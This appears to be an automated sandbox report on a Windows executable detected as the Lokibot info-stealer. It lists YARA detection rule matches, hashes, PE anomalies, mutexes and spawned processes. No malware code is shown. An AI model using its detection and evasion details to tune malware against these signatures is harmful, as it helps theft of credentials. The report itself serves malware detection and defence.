Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: lqoUUYTMsL.exe PID: 7104, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: lqoUUYTMsL.exe PID: 6408, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

PE file contains section with special chars

Source: lqoUUYTMsL.exe

Static PE information: section name: C)Ez

PE file has nameless sections

Source: lqoUUYTMsL.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B3B80	0_2_018B3B80
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018BA3B8	0_2_018BA3B8
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B29F8	0_2_018B29F8
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B8DF8	0_2_018B8DF8
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018BB2A0	0_2_018BB2A0
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B7E10	0_2_018B7E10
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B9028	0_2_018B9028
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B4A40	0_2_018B4A40
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B3268	0_2_018B3268
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B0070	0_2_018B0070
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B2989	0_2_018B2989
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B6D88	0_2_018B6D88
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B6791	0_2_018B6791
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B6B91	0_2_018B6B91
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B6990	0_2_018B6990
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B6BA0	0_2_018B6BA0
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B69A0	0_2_018B69A0
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B67A0	0_2_018B67A0
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B57B8	0_2_018B57B8
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B57C8	0_2_018B57C8
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B81C1	0_2_018B81C1
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B8DDC	0_2_018B8DDC
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B7DD0	0_2_018B7DD0
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B1DD5	0_2_018B1DD5
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B61E0	0_2_018B61E0
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B61F0	0_2_018B61F0
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018BD100	0_2_018BD100
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018BD300	0_2_018BD300
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018BCB28	0_2_018BCB28
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018BD530	0_2_018BD530
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B6D78	0_2_018B6D78
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B3688	0_2_018B3688
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018BC0C0	0_2_018BC0C0
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B78F1	0_2_018B78F1
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B4A0B	0_2_018B4A0B
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B0006	0_2_018B0006
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B9018	0_2_018B9018
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B7827	0_2_018B7827
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B7840	0_2_018B7840
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B0E47	0_2_018B0E47
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B1E50	0_2_018B1E50
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A9D48	0_2_056A9D48
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A6101	0_2_056A6101
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A0070	0_2_056A0070
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A5840	0_2_056A5840
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A5018	0_2_056A5018
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A6F30	0_2_056A6F30
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A330F	0_2_056A330F
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A4520	0_2_056A4520
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056ABC58	0_2_056ABC58
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A5C50	0_2_056A5C50
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A0006	0_2_056A0006
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A34E2	0_2_056A34E2
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A44D5	0_2_056A44D5
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A7CB0	0_2_056A7CB0
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A8C88	0_2_056A8C88
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A349A	0_2_056A349A
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A97C8	0_2_056A97C8
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056AABA8	0_2_056AABA8
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A4F81	0_2_056A4F81
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A9270	0_2_056A9270
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A8E38	0_2_056A8E38
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 2_2_0040549C	2_2_0040549C
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 2_2_004029D4	2_2_004029D4

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: String function: 00405B6F appears 42 times

Source: lqoUUYTMsL.exe, 00000000.00000002.1655933278.000000000565D000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameserver1.exe8 vs lqoUUYTMsL.exe
Source: lqoUUYTMsL.exe, 00000000.00000002.1654064139.000000000134E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorwks.dllT vs lqoUUYTMsL.exe
Source: lqoUUYTMsL.exe, 00000000.00000000.1634107526.0000000000D72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameserver1.exe8 vs lqoUUYTMsL.exe
Source: lqoUUYTMsL.exe	Binary or memory string: OriginalFilenameserver1.exe8 vs lqoUUYTMsL.exe

Source: lqoUUYTMsL.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: lqoUUYTMsL.exe PID: 7104, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: lqoUUYTMsL.exe PID: 6408, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: lqoUUYTMsL.exe

Static PE information: Section: C)Ez ZLIB complexity 1.0003355449756888

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/3@1/1

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_012DA9B6 AdjustTokenPrivileges,		0_2_012DA9B6
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_012DA97F AdjustTokenPrivileges,		0_2_012DA97F

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

Code function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

2_2_0040434D

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\lqoUUYTMsL.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Mutant created: NULL

Source: lqoUUYTMsL.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lqoUUYTMsL.exe

ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe "C:\Users\user\Desktop\lqoUUYTMsL.exe"
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe	Jump to behavior
